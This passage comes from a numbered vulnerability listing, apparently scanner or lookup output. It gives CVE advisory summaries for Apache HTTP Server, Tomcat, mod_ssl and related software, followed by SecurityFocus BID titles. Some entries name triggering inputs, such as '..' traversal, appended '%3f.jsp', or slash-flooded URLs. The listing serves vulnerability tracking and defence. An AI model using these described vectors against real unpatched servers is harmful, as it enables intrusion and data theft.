10774| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
10775| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
10776| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
10777| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
10778| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
10779| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
10780| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
10781| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
10782| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
10783| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
10784| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
10785| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
10786| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
10787| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
10788| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
10789| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
10790| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
10791| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
10792| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
10793| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
10794| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
10795| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
10796| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
10797| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
10798| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
10799| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
10800| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
10801| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
10802| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
10803| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
10804| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
10805| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
10806| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
10807| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
10808| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
10809| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
10810| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
10811| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
10812| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
10813| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
10814| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
10815| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
10816| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
10817| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
10818| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
10819| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
10820| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
10821| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
10822| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
10823| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
10824| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
10825| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
10826| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
10827| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
10828| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
10829| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
10830| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
10831| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
10832| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
10833| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
10834| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
10835| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
10836| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
10837| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
10838| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
10839| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
10840| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
10841| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
10842| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
10843| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
10844| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
10845| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
10846| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
10847| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
10848| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
10849| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
10850| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
10851| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
10852| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
10853| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
10854| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
10855| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
10856| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
10857| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
10858| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
10859| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
10860| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
10861| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
10862| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
10863| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
10864| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
10865| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
10866| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
10867| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
10868| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
10869| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
10870| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
10871| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
10872| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
10873| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
10874| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
10875| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
10876| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
10877| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
10878| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
10879| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
10880| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
10881| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
10882| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
10883| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
10884| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
10885| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
10886| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
10887| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
10888| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
10889| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
10890| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
10891| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
10892| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
10893| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
10894|
10895| SecurityFocus - https://www.securityfocus.com/bid/:
10896| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
10897| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
10898| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
10899| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
10900| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
10901| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
10902| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
10903| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
10904| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
10905| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
10906| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
10907| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
10908| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
10909| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
10910| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
10911| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
10912| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
10913| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
10914| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
10915| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
10916| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
10917| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
10918| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
10919| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
10920| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
10921| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
10922| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
10923| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
10924| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
10925| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
10926| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
10927| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
10928| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
10929| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
10930| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
10931| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
10932| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
10933| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
10934| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
10935| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
10936| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
10937| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
10938| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
10939| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
10940| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
10941| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
10942| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
10943| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
10944| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
10945| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
10946| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
10947| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
10948| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
10949| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
10950| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
10951| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
10952| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
10953| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
10954| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
10955| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
10956| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
10957| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
10958| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
10959| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
10960| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
10961| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
10962| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
10963| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
10964| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
10965| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
10966| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
10967| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
10968| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
10969| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
10970| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
10971| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
10972| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
